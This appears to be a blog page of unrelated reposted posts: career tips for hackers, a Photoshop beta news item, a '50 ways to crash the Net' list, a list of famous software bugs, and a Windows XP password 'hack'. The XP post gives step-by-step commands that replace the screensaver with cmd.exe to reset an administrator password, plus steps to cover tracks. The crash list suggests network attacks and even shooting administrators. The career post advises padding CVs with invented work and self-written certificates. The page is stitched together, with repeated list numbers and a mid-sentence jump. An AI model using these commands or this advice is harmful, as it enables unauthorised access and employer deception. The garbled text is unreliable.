Wednesday, January 17, 2007

hacking 4 a job

Young hackers usually dream about becoming a well-known security expert,
whose job is about executing high profile penetration tests on fortune
100 companies. Why? Cool and interesting projects, bleeding edge hard and
software to work with, new areas to learn and gain knowledge, earning money,
creating (another) high profile - this time with the real name -
most hackers dream of that - few actually achieve that.

This article is meant to change this.

It is mostly about the pitfalls a hacker has to overcome, especially when
a company doesn't like "evil" hackers for the job. Therefore a sound and
seemingly logical explanation, where he did get this security knowledge is
very important. Some people might say "hey, nice article, but it is not
really about hacking" - well, I say it is. It is about hacking coporate
minds. You want to achieve your goal - working for that fortune 10 bank as
an IT security expert, but f*ck, they don't like hackers. Hackers are evil,
criminals, they say. So you have to hack their brains to get what you want!

First, it should be clear what a "security job" is about - or being
a whitehead. The world, work and views are different. The section
"Hacker World vs. Security World" is describing this.

Then you might need additional knowledge to impress your hope-fully new
employer - also the ways for that are pretty clear, you can find some hints
at "Getting a Background".

After you know what will await you, you actually have to apply for a job.
There are some do's and some don'ts you should keep in mind for writing
your application documents and when you've got your job interview. The
sections "Truthful or not", "How to find a job", "Getting your CV right"
and "The Job Interview" will keep you on the right track.

And finally: "Things you should not do after getting the job". This might
be more important than you think.

Last thing you should keep in mind when reading this text: it is
especially meant for people who have a hard time to get employed because
the company they are interested in have got a "no-hacker" policy, or the
country they are living in are seeing hackers not as an enrichment to the
security business. If you are trying to get into a company which welcomes
hackers with open arms - which is rarely the case - this text can still be
important to you.

About me: as a former hacker and phreaker, I'm working for 7 years in the
security field now and had to struggle several times with this topic. I
also helped several friends and peers to their security jobs so far. The
contents here is my own vast ;-) experience - with input from friends and
colleagues.

Enjoy.



----| Hacker World vs. Security World

What is the hacker's view of the world? Wardialing modems, attacking web
servers, writing exploits, driving around in the city to find vulnerable
wavelan networks, exploring bleeding edge hardware, programming a new tool
for weeks until it is perfect, meeting with hacker friends for weekend
sessions and drinking jolt - well and having a good time.
Is a security job like that? Well, of course not - but what is it actually
about?
In the security field, there are different positions.
a) The Programmer - he deals with programming operating systems or
applications. The job might be just that of a programmer (e.g.
programmer for the Sun Solaris kernel), or a development of security
components (e.g. part of the development team of Checkpoint's
Firewall-1), or part of the security audit team of a software package
(e.g. AIX security team from IBM in Austin/Texas).
b) The Administrator - he is responsible for running special equipment or
whole infrastructures. An administrator can be responsible for
all servers of a special operating system (e.g. Windows admin), the
network (LAN/WAN admin), applications (SAP, Oracle, Lotus Notes, etc.),
firewalls, etc.
The smaller the company, the broader and more general is usually the
scope of work for an administrator.
c) The Operator - sitting in front of a monitor (or several) all days and
evaluating output of logs and system messages. Boring. But usually you
get a good overall salary through additional holiday, weekend bonus
etc. Hackers rarely do that - but it's an option.
d) The Security Officer - he is writing the security policies and
procedures for the company. If a security incident is happening, he
has to decide what to do. Usually, he is also part for defining
security and access roles for important. A very important job, but
that of a paper tiger - and attending many boring meetings and
eventually reviewing some audit files.
e) The IT Auditor - an independent organ within the organization which
ensures the adequateness of IT controls. A job where you not make many
friends, but usually can travel around the world, if you are working
for a big company. Most audit work is about organisational procedures
and if they are followed, interviews and reviewing logs. However in
some positions, you can also things like penetration tests - but also
if that's the case, it's just a small part of the job description.
An IT auditor usually can not build up deep knowledge, however get a
very broad knowledge and a very good overview of the company.
f) The Consultant - he works for a consultant company (whew!). From a
hacker's point of view, there are 3 types: general consultant
companies (e.g. McKinsey, KPMG, Ernst & Young), IT consultant
companies (e.g. IBM Consulting, Accenture) or IT security companies
(e.g. @stake, secunet, etc.). What is the difference? Well,
specialization of the company and size of the company.
It should be noted that most big audit companies (e.g. PWC, KPMG,
etc.) also have got IT security auditors, which do a mix of e) and f).
g) The "Hacker" - employed by the company to check the security of
networks, review source code, etc. In some companies, they are hired to
show to customers or press they employ cool people (hi to Ken William
;-) This job type is actually very rare ...

In some companies - especially security consultant companies who also
develop software, some people can actually be programmer and consultant.
This is the case for @stake, Razor, eEye, etc. - but of course also there
just for some special guys.

So that you have got a picture now what type of work there is to do, how
is the work done? What is the view on the work?

1) A hacker's "job" is actually very easy - viewed from a whiteheads side.
"They try to break into some company, and if they find a hole - great, if
not - well they try another company. They only have to find one hole,
that's enough." Also this is exaggerated, there is much truth in it, if
you see it as a game between "black" and "white".
A "whitehead" has to find all holes, and close them. That's a completely
different view - and many will say more challenging as well.
2) When you changed the side - you also have to change your work habits.
You will normally get a description what is your scope of work - and
that's what your job is about. You can't to just what you think would
be fun to do. Doing a fast penetration test on your companies mail
server? Might bring you to jail if you were not authorized.
Every job brings limits with them - and if you want to keep yours, you
have to follow them.
3) Then you have to follow procedures (e.g. the company's security
policies, working hours, dress code). In some companies these are very
strict, in others it's very relaxed.
4) You can not just work how you want to. If you are a database
administrator or you got a job in a security consultant company to do
penetration tests: you must either follow a methodology how you have to
do your work - to ensure the quality, or you have got to document
everything you did - if someone else has to pick-up your work later, he
knows what you did and why.
5) A security job does not mean that you can implement all security you
want. Everything will be focused on business needs. Want to install new
firewalls, tighten down the filter lists in the firewall, install a new
reverse proxy for the eCommerce system? Your boss will ask you why this
is needed, what the cost will be, and the impact. The new firewall might
add security, but be too expensive. Or the tightened filter lists would
make administration, content updates etc. more difficult. Or the reverse
proxy might downgrade performance, which would frustrate customers.
6) Ever heard about the famous "soft skills"? Yeah, you might be
technically an expert, but within a company, you are not alone, and you
don't act and work alone. This is why good communication skills (being
friendly, helpful, open, respectful, truthfully etc. blabla) are very
important. In fact you should even consider this for your private life
anyway - it enhances your friendship with hackers (and girls as well!
;-) ...

So why going corporate anyway? It doesn't sound like fun. Well - it can be
fun. It depends on the company's culture and how much freedom you get.
And the work can be very rewarding from what you can learn, expand your
knowledge, environments and companies you see and working professionally
the first time in your life.

So brighten up - it can be fun and rewarding. Just remember: corporate
life is not a piece of cake and to take too easy. You'll have to adapt.



----| Getting a Background

Now that you know what a corporate life is about, you can qualify yourself
better if you've got security background - not hacker background - already.
Helpful are e.g. Cisco configuration know-how, solaris/aix/win2k
administrator know-how, knowledge about security policies, hands-on
experience about firewall setups and server hardening, programming skills,
etc.
What skills are especially helpful for the job you would like to do?
Take a look at the job descriptions from the previous paragraph and then
imagine what kind of knowledge is needed.
Then try to acquire somehow the knowledge. E.g. buy books, read online
articles about the topics, buy some old and cheap cisco/sun/rs6000/etc.
hardware and get some experience.
www.securityfocus.com is a good starting point for finding related
articles and books, ebay.com is a good place to find hardware, etc.

However the best is to get an internship or part-time job at an ISP or
security division of a big company.



----| Truthful or not?

There are companies out there which have got a "no hacker" policy.
There are countries where it is common thinking that hackers do "hacking"
and therefore not adequate for "security" jobs - for ethical,
philosophical or technical reasons.
If you think that a company has got a "no hacker" policy - don't tell them.
If you don't know if they have got such a policy - don't tell them either.
You can still do that later if you get the strong feeling in the interview
they think positively about hackers. Otherwise: don't.



----| How to find a job

For some people it's easy: the job offers are made to them. For this you've
got to become famous or well-known in the security/hacker community. Good
examples for this are the l0pht team or ADM, or single individuals like
rain forrest puppy and Fyodor.
If the job doesn't come to you, you have to look for a job yourself. There
are three ways:
1) Go to security conferences (or hacker conferences) - Usenix
Security Symposium and Blackhat Briefings are usually very good for
this, hold a good presentation, talk to some people ... and there you
are.
2) You search for security jobs on Internet job search engines (keywords
like "firewall", "security" even maybe "hacker" will bring you further),
additionally www.securityfocus.com has got the SecurityJobs mailing
list (and archive).
3) You directly send your resume to the companies you want to work for.
This is actually very effective. Job ads on the Internet, computer
magazines or newspapers are expensive and usually don't bring much
results for the companies as the market for security specialists is
empty most of the time. So if you just send the IT security departments
your resume - you will get at least a job interview 90% of the time.

Or if you know someone within a company, he might propose you as a new
team member :-) that would be the easiest way ...



----| Getting your CV right

CV stands for Curriculum Vitae and means resume or application documents.
Before you start writing yours, get on the internet and read tips about
writing one.
Specifically for hackers going corporate, you should take of the following:
1) Your CV should contain no holes. If you spent 3 month burping and
farting in your room, put in your CV:
"January 2000 - March 2000: private software development project on
secure web applications. I experimented with various blabla, and
developed blablabla which enhanced security blabla ..."
I guess you get the picture.
2) Whatever you did - high school, internship, university, part-time jobs -
mention everything from a light what you did there in the security
field - and a bit more ... e.g. if you administrated a webserver for an
ISP as an part-time job, you write:
"I was responsible for the security of the webserver, had to review
the system and apache log files, review the source code of the CGIs,
blablabla"
3) If you did internships, part-time jobs or security related courses at
high school or university (even about cryptography and system
management) try to get a internship certification, signed resume,
whatever. Try to influence the contents so it focuses on security.
In many companies you usually write them yourself and let them sign by
the boss - this is the easiest way of course.



----| The Job Interview

Show that you are ethical - give them the feeling that you would never
ever hack the company - without proper authorization by management. If
they think you are a shady character, no way they will hire you. Even if
they think positively about hackers.

Don't tell them you are a hacker, unless you really get the feeling during
the interview that this would help you!

If the company has got a "no hacker" policy, you'll have to face questions
like "Are you a hacker", "have you been a hacker before", "could you get
into the system you once administrated?", etc. Sometimes even challenging
you like "Are you skilled enough to still get into the firewall at the
university you built up?".
If you don't want to lie (like me), you can answer them like: "What do you
mean by 'if I am a hacker', if you mean 'someone who is vandalizing web
pages' - no, never, if you mean 'someone curious about security and
paranoid enough to tighten down everything and programming until 4 o'clock
in the morning' - yes, then I'm a hacker".

If you don't want to appear like a hacker - don't dress like one. Dress
Like the company expects the proper person to be. This might be a business
suit or casual. If in doubt: business suit, especially if it's a
consultant/auditor job.

And of course the usual tips for job interviews apply here as well. Buy a
book about that or read them on the internet.



----| Things you should not do after getting the job

Remember the following things:

Do NOT hack the company you are working for! If you are working for an
external audit or consultancy company, this includes your customers!
Do NOT hack other companies from the company you are working for or it's
customers!
NEVER tell anyone from the hacker scene about the security (or insecurity)
of your company (and customers)!
NEVER tell your company (or your customers) secrets from the hacker scene -
otherwise you'll not have got much friends anymore ...
It might not be wise to tell people in the company, that you are (or have
been) a hacker. People usually can't keep their mouths shut.
It is wise not to do any illegal things after becoming corporate - if you
are caught hacking into some systems - do you think your company will
believe that you never hacked them .... ?! So better become a greyhat, and
have fun researching and still do the same stuff like before. But either
authorized or passive watching ...



----| Closing Remarks

Several companies which fear hackers will think after reading this -
"f*ck, we have to tighten the "new employee" process".
But I will tell you something: Too late ... we are already everywhere.
In all major consultant, audit and software development, banks and IT
security companies are former hackers. And guess what?
The world is not crumbling down in despair. Most hackers have ethics.
You might not like their ethical code, but most of them have a code of
honour, and would never hack the company they are working for.
You might say - "but the others, not all are good" - yes, that's true,
but so is the rest of the world - same is true about people who are not
hackers. If you fight us you will loose - valuable team-members, with
strong skills and experiences. Think about it.

Thursday, January 4, 2007

photoshop new version

early hours of Friday, Dec. 15, a public beta of Photoshop Creative Suite 3 will be made available for download on Adobe Labs, the developer website used to showcase emerging technologies and beta software.
This new Photoshop release is the first version to run natively on Intel-based Apple Macintosh computers. Many creative professionals working in art, photography and video favor the Macintosh platform. However, the performance of Adobe's flagship product has suffered since Apple made the switch from PowerPC processors to Intel processors earlier this year.
In addition to its availability as a universal binary application for Mac OS X, the beta release will be compatible with both Microsoft Windows XP and Windows Vista operating systems.
"This is an exciting time for the Mac, and Adobe wanted to ease the move to new Intel-based systems with a preview release of Photoshop CS3," said John Loiacono, senior vice president of the creative solutions business unit at Adobe in a statement to the press.
Photoshop is one of the most widely used digital-imaging software applications in the world, and its release is being eagerly awaited by creative professionals working in the web- and print-publishing industries. The new version of the software will feature significant enhancements of Photoshop's user interface and functionality.
The public beta of Photoshop, a first for the application, will be made available for download free of charge. A valid registration and serial number from Photoshop CS2, Adobe Creative Suite 2, Adobe Creative Suite Production Studio, Adobe Design Bundle, Adobe Web Bundle or Adobe Video Bundle will be required to activate the program.
By releasing a beta version of the next Photoshop early, Adobe hopes to gather feedback before the product's official launch next year.
Friday's beta release will also include Adobe Bridge, a file-management application for Creative Suite, and Device Central, a cell phone and handheld emulator that allows developers to test interactive applications for mobile devices.
Photoshop is just one program in Adobe's family of productivity tools, Creative Suite. The next version of Creative Suite -- named Creative Suite 3 -- is expected to be released in spring 2007. Adobe has not announced any future plans to release other CS3 applications as beta software.
Creative Suite 3 will feature a range of digital-imaging, desktop-publishing, web-publishing, audio and video tools in several different bundles. Pricing information for CS3 is unknown at this time.
In the past, when Adobe has released public trial versions of its software the company has not provided technical support by telephone or e-mail. Support for the beta of Photoshop CS3 will be available through community forums on the Adobe Labs website.

ways 2 break net

On 17 July 1997, the Internet received a critical warning about its future, but that day and its lessons are already fading from memory. On that day, two blunders conspired to shut down the Internet for millions of users.
Early that morning, a system operator accidentally uploaded a corrupt database to the Internet's root domain servers. Until the problem was corrected, it was impossible to send email or access the Web within the .com and .net domains. The Internet was suddenly numeric, like the phone system. Forget about contacting http://www.hotwired.com - anybody trying to get to Synapse couldn't, unless they knew the numeric address of one of HotWired's servers.
The second snafu was more localized, but more severe for those affected. On that same Thursday morning, a construction crew in Virginia inadvertently sliced through a fiber-optic cable belonging to WorldCom and leased to Sprint. Many of Sprint's Internet customers in the mid-Atlantic states and New England couldn't get on the Net at all.
As someone affected by both outages, I spent most of the morning trying to figure out who to blame - and how to get my system operational again. But there was nothing I could do but wait.
The myth persists that the Net was built to withstand the blast of an atomic bomb. But that was the military-run Arpanet of the 1970s, not the corporate-run Internet of today. "What's basically wrong is we are centralized," explains Dr. Peter Salus, Internet historian and author of Casting the Net. "We have violated the constraints that the Department of Defense had in 1967."
Indeed, one of the most significant results of commercializing the Internet has been to create more single points of failure, rather than a more redundant and reliable network. That's because companies are busy finding ways to make themselves indispensable: User self-sufficiency is incompatible with sustained corporate profits.
In December 1995, Internet pioneer Bob Metcalfe predicted a global Internet meltdown. Since then, he has eaten his words. Nevertheless, real problems with the Internet remain. What's more, it's increasingly likely that these lurking problems will be deliberately exploited or tickled by accident, and result in another global Internet collapse.
How might it be done? The following 50 ways to crash the Net are based on conversations I had with Gene Spafford at Purdue University, Alan Wexelblat at the MIT Media Lab, Eugene Kashpureff at AlterNIC, and Fred Cohen at Sandia Laboratory's Computer Security Group. Most of these attacks work by targeting a single point of failure within today's Internet. Others rely on creating storms of activity that overwhelm legitimate network traffic.
Click the right arrows below to begin.
(Please note: Neither I nor HotWired suggest that you actually attempt any of these means of sabotaging the Internet, nor do we condone any such attempts; we merely offer these as frightening - and funny - examples of how vulnerable the information infrastructure we rely on really is.)
Domain name system attacks
DNS is at once vital to today's Internet and poorly designed. Crash it, and you leave the Internet in shambles.
1. Disrupt the domain name system by uploading a bogus database to the root domain servers. (Network Solutions already demonstrated this one.)
2. Flood prominent nameservers with requests from all over the Internet.
3. Mount host attacks against the machines on which the name servers are running.
4. Find a bug in the DNS server that makes the program crash when provided with bogus input. (This happens about once a week at my ISP for no apparent reason, so there definitely is a bug.) Exploit continuously.
5. Find a bug in the Microsoft Windows 95 DNS client that causes the computer to format its hard drive when resolving a particular URL. Publish that URL.
6. Falsify the DNS entries for a major WWW server, like AltaVista, so that people trying to reach these machines are redirected to the DNS port on the root servers. Ouch!
7. Buy 10 backhoes.
Router attacks
The diversity of the early Internet is long gone. These days, 80 to 90 percent of the computers that run the Net are routers manufactured by Cisco Systems. This makes them especially vulnerable to common flaws.
8. Find a key bug in Cisco's operating system and exploit it.
9. Get a job at Cisco and plant your own vulnerability in the operating system.
10. Convince 50,000 people to ping key backbone routers, resulting in CPU overload.
11. Capture administrative passwords used to access key Internet backbone routers. Break in and change configurations, then change the passwords.
12. Alter each backbone ISP's master router configuration files so that next time the routers are updated, they crash.
13. Block legitimate administrative access to the machines.
14. Insert forged routes into Internet routing tables to take key machines off the Internet.
15. Announce on the Internet's routing tables that your router is absolutely the best router to get to Mae East.
16. Get physical access to key routers in out-of-the-way locations and unplug them.
17. Don't bother with the routers, just unplug the air conditioners.
Critical host attacks
A small number of computers on the Internet are accessed by a tremendous number of people. Attacking these machines can make the Internet unusable for millions of users.
18. Find the administrators of key machines and personally threaten them so they don't come to work. Alternatively, shoot them.
19. Call the phone company and tell them the leased lines connecting key computers are no longer needed. "We're having a new T3 installed from UUNET." Once leased lines are disconnected - even by accident - it can take weeks to get them re-established.
20. Steal the VeriSign master key and issue fraudulent certificates.
21. Flood VeriSign's certificate revocation server with requests. Result: ActiveX applets won't load.
22. Instead of actually breaking into one of these machines, just make it appear that way. Frenzied sysadmins are sure to make catastrophic mistakes.
IP attacks
Internet enthusiasts love to boast about the power of Internet protocol, but in fact ICMP packets have no authentication, which opens up a number of interesting opportunities for exploitation.
23. Send fake ICMP Redirect messages to major sites, causing those sites to send their packets to the wrong destinations. The packets will eventually get to the correct location, but not without causing needless congestion.
26. Send ICMP Quench messages. These tell the major hosts to send out their packets more slowly.
27. Send forged ICMP Host Unreachable messages to a few key machines, telling them that machines with which they must communicate are unreachable.
28. Send ICMP or UDP Echo-virus packets to well-known hosts. Then sit back and watch them tie themselves in knots.
End-user-based attacksThe major limitation of the attacks listed above is their single point of origin. A more effective approach is to trick unsuspecting Internet users into doing your bidding.
27. Run a contest with a US$10,000 reward that goes to the person who stays connected to your Web site for the longest period of time.
28. As part of the contest, give extra credit to users who run a downloadable Web spider and continuously send you the results.
29. Distribute a hostile computer program on your Web page that reads through a person's email address book and sends a copy of itself to each person listed therein.
30. Distribute a hostile applet that disconnects users' modems and calls the unpublished technical-support number of a major Internet backbone provider.
31. Draw people to your Web page by loading bogus DNS entries for popular machines, like home.netscape.com or www.microsoft.com, into prominent nameservers, so that people trying to go to these machines are sent to your Web server. (That's what AlterNIC did to steal www.internic.net.)
32. Distribute easy-to-use mail spamming programs for free.
End-user attacks
Instead of having end users attack the Internet, attack the end users themselves. The resulting calls for help will swamp tech-support lines.
33. Have a hostile program upload bogus firmware to users' modems. Once the modems crash, there is no way to download a fresh copy of the firmware.
34. Have the hostile applet erase the computer's ROM BIOS. (Most new computers have their ROM BIOS stored in EEPROM.)
35. Once the hostile program finishes executing, have it encrypt the user's hard drive and print a ransom note claiming that the attack came from the user's ISP.
36. Alternately, don't bother attacking the user's machine - just send out spam mail that appears to come from the user's ISP and asks them to call tech support right away.
Social-engineering attacks
Not all attacks need to be technical. Here are some attacks aimed at the Internet's social fabric. These may not crash the Net so much as strangle it to death.
38. Get Congress to pass CDA 2.0.
38. Convince a major Internet service provider not to carry its competitors' packets unless they pay for the right.
39. Convince a few key senators that the Internet is a US resource that should be exploited for the national good.
40. Convince the National Science Foundation that the Internet is an NSF resource that should be exploited to fund science research.
41. Establish an Internet governance organization that claims to represent all netizens.
42. Establish a second organization that represents all ISPs.
43. Encourage webmasters to unionize and strike.
44. Spam people with death threats to convince them that the Internet is unsafe.
45. Hack Wall Street's computers and set the price of Cisco stock to $1.50.
Insanely huge attacks
When I called up Fred Cohen at Sandia Laboratory's Computer Security Group, I discovered that he has spent years thinking up ways to attack the Internet's infrastructure. Some of his favorites include:
46. Create cascade failures on the power grid. This would take out the Internet, and a lot more. Something like this happened in Cambridge, Massachusetts, when more than 200 businesses and hundreds of thousands of users up and down New England lost their Net connections after an explosion knocked out electrical power in large parts of Boston and the surrounding area.
47. Create a cascade failure in the phone system by modifying a few bits of code in a major telephone company's switching systems.
48. Do a nuclear test above the atmosphere. According to Cohen, a test conducted by the US military in the '50s "took out communications from New York through Sydney for several minutes" by disrupting the magnetic field of the earth.
49. Inject power to the earth's field lines at the north and south poles to disable large areas of electromagnetic communications (there is actually a patent on this technique).
In the overall scheme of things, taking out the Internet would certainly hurt. But we are not as dependent on the Internet now as we soon will be, when an Internet crash could delay a military deployment or create financial havoc. Today, says Cohen, if you want to destroy a country's infrastructure, you're better off going after its power stations than its Internet dial-ups.
But that's changing. The Internet is being used for more critical things - and it's a single network, rather than multiple, independent networks, which would have a better chance of withstanding serious attacks. Ten years from now, things could be much worse.
So what's the 50th way to crash the Internet? It's easy, really:
50. Wait until 1 January 2000.

software bugs

By Simson Garfinkel Also by this reporter02:00 AM Nov, 08, 2005
Last month automaker Toyota announced a recall of 160,000 of its Prius hybrid vehicles following reports of vehicle warning lights illuminating for no reason, and cars' gasoline engines stalling unexpectedly. But unlike the large-scale auto recalls of years past, the root of the Prius issue wasn't a hardware problem -- it was a programming error in the smart car's embedded code. The Prius had a software bug.
With that recall, the Prius joined the ranks of the buggy computer -- a club that began in 1945 when engineers found a moth in Panel F, Relay #70 of the Harvard Mark II system.The computer was running a test of its multiplier and adder when the engineers noticed something was wrong. The moth was trapped, removed and taped into the computer's logbook with the words: "first actual case of a bug being found."
Sixty years later, computer bugs are still with us, and show no sign of going extinct. As the line between software and hardware blurs, coding errors are increasingly playing tricks on our daily lives. Bugs don't just inhabit our operating systems and applications -- today they lurk within our cell phones and our pacemakers, our power plants and medical equipment. And now, in our cars.
But which are the worst?
It's all too easy to come up with a list of bugs that have wreaked havoc. It's harder to rate their severity. Which is worse -- a security vulnerability that's exploited by a computer worm to shut down the internet for a few days or a typo that triggers a day-long crash of the nation's phone system? The answer depends on whether you want to make a phone call or check your e-mail.
Many people believe the worst bugs are those that cause fatalities. To be sure, there haven't been many, but cases like the Therac-25 are widely seen as warnings against the widespread deployment of software in safety critical applications. Experts who study such systems, though, warn that even though the software might kill a few people, focusing on these fatalities risks inhibiting the migration of technology into areas where smarter processing is sorely needed. In the end, they say, the lack of software might kill more people than the inevitable bugs.
What seems certain is that bugs are here to stay. Here, in chronological order, is the Wired News list of the 10 worst software bugs of all time … so far.
July 28, 1962 -- Mariner I space probe. A bug in the flight software for the Mariner 1 causes the rocket to divert from its intended path on launch. Mission control destroys the rocket over the Atlantic Ocean. The investigation into the accident discovers that a formula written on paper in pencil was improperly transcribed into computer code, causing the computer to miscalculate the rocket's trajectory.
1982 -- Soviet gas pipeline. Operatives working for the Central Intelligence Agency allegedly (.pdf) plant a bug in a Canadian computer system purchased to control the trans-Siberian gas pipeline. The Soviets had obtained the system as part of a wide-ranging effort to covertly purchase or steal sensitive U.S. technology. The CIA reportedly found out about the program and decided to make it backfire with equipment that would pass Soviet inspection and then fail once in operation. The resulting event is reportedly the largest non-nuclear explosion in the planet's history.
1985-1987 -- Therac-25 medical accelerator. A radiation therapy device malfunctions and delivers lethal radiation doses at several medical facilities. Based upon a previous design, the Therac-25 was an "improved" therapy system that could deliver two different kinds of radiation: either a low-power electron beam (beta particles) or X-rays. The Therac-25's X-rays were generated by smashing high-power electrons into a metal target positioned between the electron gun and the patient. A second "improvement" was the replacement of the older Therac-20's electromechanical safety interlocks with software control, a decision made because software was perceived to be more reliable.
What engineers didn't know was that both the 20 and the 25 were built upon an operating system that had been kludged together by a programmer with no formal training. Because of a subtle bug called a "race condition," a quick-fingered typist could accidentally configure the Therac-25 so the electron beam would fire in high-power mode but with the metal X-ray target out of position. At least five patients die; others are seriously injured.
Story continued on Page 2 »overflow in Berkeley Unix finger daemon. The first internet worm (the so-called Morris Worm) infects between 2,000 and 6,000 computers in less than a day by taking advantage of a buffer overflow. The specific code is a function in the standard input/output library routine called gets() designed to get a line of text over the network. Unfortunately, gets() has no provision to limit its input, and an overly large input allows the worm to take over any machine to which it can connect.
Programmers respond by attempting to stamp out the gets() function in working code, but they refuse to remove it from the C programming language's standard input/output library, where it remains to this day.
1988-1996 -- Kerberos Random Number Generator. The authors of the Kerberos security system neglect to properly "seed" the program's random number generator with a truly random seed. As a result, for eight years it is possible to trivially break into any computer that relies on Kerberos for authentication. It is unknown if this bug was ever actually exploited.
January 15, 1990 -- AT&T Network Outage. A bug in a new release of the software that controls AT&T's #4ESS long distance switches causes these mammoth computers to crash when they receive a specific message from one of their neighboring machines -- a message that the neighbors send out when they recover from a crash.
One day a switch in New York crashes and reboots, causing its neighboring switches to crash, then their neighbors' neighbors, and so on. Soon, 114 switches are crashing and rebooting every six seconds, leaving an estimated 60 thousand people without long distance service for nine hours. The fix: engineers load the previous software release.
1993 -- Intel Pentium floating point divide. A silicon error causes Intel's highly promoted Pentium chip to make mistakes when dividing floating-point numbers that occur within a specific range. For example, dividing 4195835.0/3145727.0 yields 1.33374 instead of 1.33382, an error of 0.006 percent. Although the bug affects few users, it becomes a public relations nightmare. With an estimated 3 million to 5 million defective chips in circulation, at first Intel only offers to replace Pentium chips for consumers who can prove that they need high accuracy; eventually the company relents and agrees to replace the chips for anyone who complains. The bug ultimately costs Intel $475 million.
1995/1996 -- The Ping of Death. A lack of sanity checks and error handling in the IP fragmentation reassembly code makes it possible to crash a wide variety of operating systems by sending a malformed "ping" packet from anywhere on the internet. Most obviously affected are computers running Windows, which lock up and display the so-called "blue screen of death" when they receive these packets. But the attack also affects many Macintosh and Unix systems as well.
June 4, 1996 -- Ariane 5 Flight 501. Working code for the Ariane 4 rocket is reused in the Ariane 5, but the Ariane 5's faster engines trigger a bug in an arithmetic routine inside the rocket's flight computer. The error is in the code that converts a 64-bit floating-point number to a 16-bit signed integer. The faster engines cause the 64-bit numbers to be larger in the Ariane 5 than in the Ariane 4, triggering an overflow condition that results in the flight computer crashing.
First Flight 501's backup computer crashes, followed 0.05 seconds later by a crash of the primary computer. As a result of these crashed computers, the rocket's primary processor overpowers the rocket's engines and causes the rocket to disintegrate 40 seconds after launch.
November 2000 -- National Cancer Institute, Panama City. In a series of accidents, therapy planning software created by Multidata Systems International, a U.S. firm, miscalculates the proper dosage of radiation for patients undergoing radiation therapy.
Multidata's software allows a radiation therapist to draw on a computer screen the placement of metal shields called "blocks" designed to protect healthy tissue from the radiation. But the software will only allow technicians to use four shielding blocks, and the Panamanian doctors wish to use five.
The doctors discover that they can trick the software by drawing all five blocks as a single large block with a hole in the middle. What the doctors don't realize is that the Multidata software gives different answers in this configuration depending on how the hole is drawn: draw it in one direction and the correct dose is calculated, draw in another direction and the software recommends twice the necessary exposure.
At least eight patients die, while another 20 receive overdoses likely to cause significant health problems. The physicians, who were legally required to double-check the computer's calculations by hand, are indicted for murder.

xp weakness

How to Hack a Window XP Administrator PasswordNovember 11th, 2006 — scribez
(Before you continue Read the Updates at the bottom)This is only for educational purpose it is a simple way to Hack the Window XP Administrator Password and also get away with it. To Hack the Window XP Administrator Password not many steps are involved especially if you already have a knowleged of working with the DOS prompt.
Here are the steps involved to Hack the Window XP Administrator Password .
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator PasswordA Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Thanks to internetbusinessdaily.net
Posted By Clazh
Update: Christian Mohn points out this is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.http://www.scribez.com

caller ip

softwares download